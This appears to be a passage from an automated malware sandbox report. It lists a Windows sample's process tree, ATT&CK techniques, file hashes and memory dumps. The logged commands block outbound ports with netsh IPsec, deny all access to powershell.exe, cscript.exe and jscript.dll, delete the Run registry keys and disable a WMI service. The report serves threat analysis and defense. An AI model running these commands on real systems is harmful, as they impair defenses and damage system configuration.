"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
3⤵
PID:1572

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
3⤵
PID:1412

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
3⤵
PID:3212

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
3⤵
PID:4852

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
3⤵
PID:4164

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
3⤵
PID:3300

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
3⤵
PID:224

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
3⤵
PID:2084

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
3⤵
PID:4160

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3312

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
3⤵
PID:3392

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
3⤵
- Modifies file permissions
PID:704

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
3⤵
PID:4436

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
3⤵
- Modifies file permissions
PID:2248

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
3⤵
PID:2272

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
3⤵
- Modifies file permissions
PID:208

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
3⤵
PID:872

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
3⤵
- Modifies file permissions
PID:900

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
3⤵
PID:4620

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Modifies file permissions
PID:4276

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
3⤵
PID:3308

C:\Windows\SysWOW64\takeown.exe
"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Modifies file permissions
PID:532

C:\Windows\SysWOW64\cacls.exe
"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
3⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
3⤵
PID:2096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
3⤵
PID:1096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
3⤵
PID:2936

C:\Windows\SysWOW64\sc.exe
"C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
3⤵
- Launches sc.exe
PID:704

C:\Windows\SysWOW64\sc.exe
"C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
3⤵
- Launches sc.exe
PID:3904

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e583507.rbs
Filesize
2KB

MD5
63dbb671ce32f8c4fbdc81873ba02288

SHA1
c1f3025d60ef1ed0ba09d60ef1eef1b54c23edd1

SHA256
d465345afc63bdfa3b02482ff67e989c7f0a086008beade6d43638a595b2741a

SHA512
512fb0bee4c1af2edc781c6a50109ff9a3f9fe811b880d54d9bd4131bae36cbbb830bef7d5af5a88b0357bd22b1345dd39c7a81fe120adf517ff74fb794022e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
ca90e2a24cfe6920dea7d6c125431804

SHA1
8812b894fe555ea672f6d09cfe9988b7211c5afb

SHA256
a72b37ee2de0c333a1f57da28b11ffdfbbb8b9d54c1cf74555f78a80f275e5d6

SHA512
41d09de02ecea56e802bb08396157586f2f3bedf2e9adcba13b6a8ff2c07b745e262e5b9cf6c59caeca13d46750404b0ba701f50ba4e78d39c643f67b076b637

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
45b69d1733f608c45855c377e9a06f62

SHA1
f50c92fe3157889760b1d33a081dceccdbfb923f

SHA256
963f8ccdef948b971df9de5d8512acb28dc979427016d45711f81df091dd627d

SHA512
7f4e6d33b6e5cc0f3d2e988eaa258666cf987997bedcaab8cb10dc05d08dbdfc64e57d7c4412b078b7a28077b4cb541ae1b00b8ecd45fad83557d4a6c1567b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
45b69d1733f608c45855c377e9a06f62

SHA1
f50c92fe3157889760b1d33a081dceccdbfb923f

SHA256
963f8ccdef948b971df9de5d8512acb28dc979427016d45711f81df091dd627d

SHA512
7f4e6d33b6e5cc0f3d2e988eaa258666cf987997bedcaab8cb10dc05d08dbdfc64e57d7c4412b078b7a28077b4cb541ae1b00b8ecd45fad83557d4a6c1567b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
45b69d1733f608c45855c377e9a06f62

SHA1
f50c92fe3157889760b1d33a081dceccdbfb923f

SHA256
963f8ccdef948b971df9de5d8512acb28dc979427016d45711f81df091dd627d

SHA512
7f4e6d33b6e5cc0f3d2e988eaa258666cf987997bedcaab8cb10dc05d08dbdfc64e57d7c4412b078b7a28077b4cb541ae1b00b8ecd45fad83557d4a6c1567b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3yv3rimr.b3o.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
46c29eeceeae0822991a73564e9b1a3d

SHA1
4097517ecd7cbba9db3153dccaa9134cf2a94cda

SHA256
8516101eba6eb9ba74930699edd264039052fef1535c0de5630445b45d70f9df

SHA512
c5879c3a5514aa6c709e0d860a141f0799a306c2391f6540cdbbcd16ad63e26849116881baf4e849b7b3be37557318d8a9413fa9106145fc8cc364cfb1597682

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
46c29eeceeae0822991a73564e9b1a3d

SHA1
4097517ecd7cbba9db3153dccaa9134cf2a94cda

SHA256
8516101eba6eb9ba74930699edd264039052fef1535c0de5630445b45d70f9df

SHA512
c5879c3a5514aa6c709e0d860a141f0799a306c2391f6540cdbbcd16ad63e26849116881baf4e849b7b3be37557318d8a9413fa9106145fc8cc364cfb1597682

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
6fb6cb785533927d9bcc7a94dc0b0e57

SHA1
695a8275cacdf3d061107b3292eab426aaa656bd

SHA256
e1e2f03f2b071bb59247a3ac9636421d0c9bcd9b9eeba0a941d0e393e53428d0

SHA512
536e6ed0c977701e5205fda311c7d6050f3baa24d226f21dfc09bf0936727e644b5bdb0bc02a573c049c6550c9c95f83c51ad4c5c35f60867d05d393de3288ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
6fb6cb785533927d9bcc7a94dc0b0e57

SHA1
695a8275cacdf3d061107b3292eab426aaa656bd

SHA256
e1e2f03f2b071bb59247a3ac9636421d0c9bcd9b9eeba0a941d0e393e53428d0

SHA512
536e6ed0c977701e5205fda311c7d6050f3baa24d226f21dfc09bf0936727e644b5bdb0bc02a573c049c6550c9c95f83c51ad4c5c35f60867d05d393de3288ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
76b8a4b022ea9ff44ada38fdfa9088d3

SHA1
2c5801ee8c7a113580c8e250b0cbb1e686fbb7bd

SHA256
e1cf4573b375a048fca78ec96b907099300c5e571940833c1c527e3236eba371

SHA512
c1b903bae2d035d8ad358df00e9b4f58e7217a8cc38de2185903d1a83c637972d75ea6d1e518ce2d17c86640a1882e758fe98b02d4795e183184421d0a83dbd5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
ae4bde99251e6e4544499447d83adf8f

SHA1
046debecd2626ede74a6b85ee7ab064db211cfb1

SHA256
1855218e8946dd9cf9521db632e658732f1c7e1b45e689e2672be4f94caa375a

SHA512
770af3940b09c95b160726eec7eaf38044dc565bbe0fdb815f306913e965dee1a2756b7ef2d89370d8e3ad3f2b694c46be28c91c686839b5e9881f93ce46ab90

Download Submit
C:\Windows\Installer\MSI2A38.tmp
Filesize
2.9MB

MD5
20bec50362e877fa5935cb1fc67012f9

SHA1
e437f0934a4715bde47367e8a424ae5fe6040e2f

SHA256
dbf87a5fcbfb1c8fd567e3c7a2103e63ad62422a0cc7d1ea64a265364ecfb3ba

SHA512
49dc81b3e84c189f18b599980e15b970a05152d4c91ef2125ac045005f4a7e2f74a6120a23faed814d297784a5c197d3c0b8ec59125f8172f1111a9fe9a9fad3

Download Submit
C:\Windows\Installer\MSI3351.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI3351.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI33FE.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI33FE.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI341E.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI341E.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI341E.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI344E.tmp
Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSI344E.tmp
Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSI34AC.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI34AC.tmp
Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
memory/764-157-0x0000000007140000-0x0000000007162000-memory.dmp

Filesize
136KB

Download
memory/764-153-0x0000000005F70000-0x0000000005F8E000-memory.dmp

Filesize
120KB

Download
memory/764-137-0x0000000004BB0000-0x0000000004BE6000-memory.dmp

Filesize
216KB

Download
memory/764-138-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/764-139-0x0000000005300000-0x0000000005928000-memory.dmp

Filesize
6.2MB

Download
memory/764-140-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/764-141-0x00000000050D0000-0x00000000050F2000-memory.dmp

Filesize
136KB

Download
memory/764-142-0x0000000005270000-0x00000000052D6000-memory.dmp

Filesize
408KB

Download
memory/764-158-0x00000000077C0000-0x0000000007D64000-memory.dmp

Filesize
5.6MB

Download
memory/764-148-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/764-156-0x0000000007030000-0x000000000704A000-memory.dmp

Filesize
104KB

Download
memory/764-155-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/764-154-0x00000000070A0000-0x0000000007136000-memory.dmp

Filesize
600KB

Download
memory/1988-252-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/1988-265-0x0000000007DF0000-0x000000000846A000-memory.dmp

Filesize
6.5MB

Download
memory/1988-268-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/1988-267-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/1988-266-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/1988-264-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/1988-258-0x0000000005200000-0x0000000005210000-memory.dmp

Filesize
64KB

Download
memory/2272-211-0x00000000055F0000-0x0000000005600000-memory.dmp

Filesize
64KB

Download
memory/2752-210-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/2752-214-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/2752-208-0x0000000003760000-0x0000000003770000-memory.dmp

Filesize
64KB

Download
memory/3428-133-0x00000000004C0000-0x00000000004DF000-memory.dmp

Filesize
124KB

Download
memory/5060-217-0x00000000051D0000-0x00000000051E0000-memory.dmp

Filesize
64KB

Download
memory/5060-209-0x00000000051D0000-0x00000000051E0000-memory.dmp

Filesize
64KB

Download
memory/5060-207-0x00000000051D0000-0x00000000051E0000-memory.dmp

Filesize
64KB

Download